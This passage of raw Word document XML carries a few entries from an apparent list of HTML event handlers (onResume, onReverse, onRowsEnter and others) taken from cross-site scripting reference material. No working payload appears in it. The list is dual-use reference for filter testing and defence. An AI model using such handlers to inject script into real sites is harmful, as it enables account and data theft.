                <v:shape id="Freeform 904" o:spid="_x0000_s1531" style="position:absolute;left:1930;top:-442;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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BCrccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE74LfITyhF6lZPVjdGqX+A6EH6SqF3h6b&#10;527s5mXZpLr66U2h0OMwM79hZovWVuJCjTeOFQwHCQji3GnDhYLjYfs8AeEDssbKMSm4kYfFvNuZ&#10;YardlT/okoVCRAj7FBWUIdSplD4vyaIfuJo4eifXWAxRNoXUDV4j3FZylCRjadFwXCixplVJ+Xf2&#10;YxVsvj6PQ3N+b1+KVbY3k1v/vlyTUk+99u0VRKA2/If/2jutYJqM4PdMPAJy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AQq3HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,-1l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,20l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,-259;21,-259;18,-260;0,-280;0,-283;0,-420;21,-441;1316,-441;1337,-420;1337,-280;1319,-260;1316,-259" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 903" o:spid="_x0000_s1532" type="#_x0000_t202" style="position:absolute;left:1930;top:-442;width:133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KWq8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3gFbzVpBalbo4hYEArFdT14fN08&#10;d4Obl3UTdfvvG6HgcZiZb5jZoneNuFIXrGcNryMFgrj0xnKlYV98vryDCBHZYOOZNPxSgMV88DTD&#10;zPgb53TdxUokCIcMNdQxtpmUoazJYRj5ljh5R985jEl2lTQd3hLcNfJNqYl0aDkt1NjSqqbytLs4&#10;DcsD52t7/v7Z5sfcFsVU8dfkpPXwuV9+gIjUx0f4v70xGqZqDPcz6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Epar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onResizeStart()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1750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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="898" name="Group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166"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="899" name="Freeform 901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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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Text Box 90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onResume()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9" o:spid="_x0000_s1533" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:45.6pt;height:9.15pt;z-index:-17598976;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 901" o:spid="_x0000_s1534" style="position:absolute;left:1930;top:166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MfwcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE3wX/YblC33RTH6pJXaWIbRWE0tgPuGSv&#10;2WD2bpLdavx7VxB8HGbmDLNY9bYWZ+p85VjB6yQBQVw4XXGp4O/wOZ6D8AFZY+2YFFzJw2o5HCww&#10;0+7Cv3TOQykihH2GCkwITSalLwxZ9BPXEEfv6DqLIcqulLrDS4TbWk6T5E1arDguGGxobag45f9W&#10;Qfv1UxF/b6Zt693sUOyN2aW9Ui+j/uMdRKA+PMOP9lYrmKcp3M/EI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jH8HEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,348;21,348;18,348;0,327;0,324;0,187;21,166;890,166;912,187;912,327;894,348;890,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 900" o:spid="_x0000_s1535" type="#_x0000_t202" style="position:absolute;left:1930;top:166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AI3MEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhO8zUQPMqtRRBwIgqzWg8dn82yD&#10;zUvXRO3+++Uw2PHj+71c964RT+qC9axhMlYgiEtvLFcazsXn+weIEJENNp5Jww8FWK8Gb0vMjH9x&#10;Ts9TrEQK4ZChhjrGNpMylDU5DGPfEifu5juHMcGukqbDVwp3jZwqNZMOLaeGGlva1lTeTw+nYXPh&#10;fGe/j9ev/JbbopgrPszuWo+G/WYBIlIf/8V/7r3RMFdpfj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ACNzBAAAA3A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onResume()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onresume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>becomes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>resumes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="74" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="267" w:hanging="27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1801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50800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="895" name="Group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80"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="896" name="Freeform 898"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="80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262 80"/>
                              <a:gd name="T3" fmla="*/ 262 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 262 80"/>
                              <a:gd name="T7" fmla="*/ 262 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 262 80"/>
                              <a:gd name="T11" fmla="*/ 262 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 241 80"/>
                              <a:gd name="T15" fmla="*/ 241 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 238 80"/>
                              <a:gd name="T19" fmla="*/ 238 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 101 80"/>
                              <a:gd name="T23" fmla="*/ 101 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 80 80"/>
                              <a:gd name="T27" fmla="*/ 80 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 80 80"/>
                              <a:gd name="T31" fmla="*/ 80 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 101 80"/>
                              <a:gd name="T35" fmla="*/ 101 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 241 80"/>
                              <a:gd name="T39" fmla="*/ 241 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 262 80"/>
                              <a:gd name="T43" fmla="*/ 262 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 262 80"/>
                              <a:gd name="T47" fmla="*/ 26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Text Box 89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80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onReverse()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6" o:spid="_x0000_s1536" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4pt;width:49.85pt;height:9.15pt;z-index:-17598464;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,80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">
                <v:shape id="Freeform 898" o:spid="_x0000_s1537" style="position:absolute;left:1930;top:80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vRdMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AW9iJrqgui1SiiCHtYBet6fzbP&#10;tti81CbV+u+NIHgcZuYbZjpvTSmuVLvCsoJ+LwJBnFpdcKbgf7/+HoFwHlljaZkU3MnBfPbRmWKs&#10;7Y13dE18JgKEXYwKcu+rWEqX5mTQ9WxFHLyTrQ36IOtM6hpvAW5KOYiioTRYcFjIsaJlTuk5aYyC&#10;zWUsV6vyvOhu/06Na46H44/uK/X12S4mIDy1/h1+tX+1gtF4CM8z4Qj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r0XTEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,262;21,262;18,262;0,241;0,238;0,101;21,80;976,80;997,101;997,241;979,262;976,262" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 897" o:spid="_x0000_s1538" type="#_x0000_t202" style="position:absolute;left:1930;top:80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KssQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNe7CauopIBUEoxnjw+Mw+&#10;k8Xs25hdNf57VxA8DjPzDTOedrYWF2q9cazgq5+AIC6cNlwq2OaLzyEIH5A11o5JwY08TCfvb2NM&#10;tbtyRpdNKEWEsE9RQRVCk0rpi4os+r5riKN3cK3FEGVbSt3iNcJtLb+TZCAtGo4LFTY0r6g4bs5W&#10;wWzH2Z85/e/X2SEzeT5KeDU4KtX76Ga/IAJ14RV+tpdawXD0A48z8QjIy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CCrL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onReverse()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(if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element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>has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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>repeatCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>greater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>one,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>begins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>backward)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1673" w:hanging="148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1852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50800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="892" name="Group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6205"/>
                          <a:chOff x="1930" y="80"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="893" name="Freeform 895"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="80"/>
                            <a:ext cx="1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 262 80"/>
                              <a:gd name="T3" fmla="*/ 262 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 262 80"/>
                              <a:gd name="T7" fmla="*/ 262 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 262 80"/>
                              <a:gd name="T11" fmla="*/ 262 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 241 80"/>
                              <a:gd name="T15" fmla="*/ 241 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 238 80"/>
                              <a:gd name="T19" fmla="*/ 238 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 101 80"/>
                              <a:gd name="T23" fmla="*/ 101 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 80 80"/>
                              <a:gd name="T27" fmla="*/ 80 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 80 80"/>
                              <a:gd name="T31" fmla="*/ 80 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 101 80"/>
                              <a:gd name="T35" fmla="*/ 101 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 241 80"/>
                              <a:gd name="T39" fmla="*/ 241 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 262 80"/>
                              <a:gd name="T43" fmla="*/ 262 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 262 80"/>
                              <a:gd name="T47" fmla="*/ 26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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 89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80"/>
                            <a:ext cx="11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onRowsEnter()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3" o:spid="_x0000_s1539" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4pt;width:58.35pt;height:9.15pt;z-index:-17597952;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,80" coordsize="116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">
                <v:shape id="Freeform 895" o:spid="_x0000_s1540" style="position:absolute;left:1930;top:80;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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Y+IcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wf7D+EO9jJmOifDVaNMYVAQH3T+gEtz&#10;bYvNTUnSNv77RRB8PJxzvsNZrqNpxUDON5YVfEwyEMSl1Q1XCk5/v+9zED4ga2wtk4IreVivnp+W&#10;mGs78oGGY6hEgrDPUUEdQpdL6cuaDPqJ7YiTd7bOYEjSVVI7HBPctHKaZV/SYMNpocaOtjWVl2Nv&#10;FOy3m1jgbnQ+FkM/699OB3m9KPX6En8WIALF8Ajf24VWMP/+hNuZd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mPiHEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,262;21,262;18,262;0,241;0,238;0,101;21,80;1146,80;1167,101;1167,241;1149,262;1146,262" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 894" o:spid="_x0000_s1541" type="#_x0000_t202" style="position:absolute;left:1930;top:80;width:116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CUxcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNpYhJ3YgUCwVBGuOhx9fs&#10;S7KYfZtmtxr/fVcQPA4z8w2zXI22EycavHGs4GWagCCunDbcKDiUH88LED4ga+wck4ILeVjljw9L&#10;zLQ7c0GnfWhEhLDPUEEbQp9J6auWLPqp64mjV7vBYohyaKQe8BzhtpOzJJlLi4bjQos9vbdUHfd/&#10;VsH6m4uN+d39fBV1YcoyTXg7Pyo1eRrXbyACjeEevrU/tYJF+g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EJTF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onRowsEnter()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
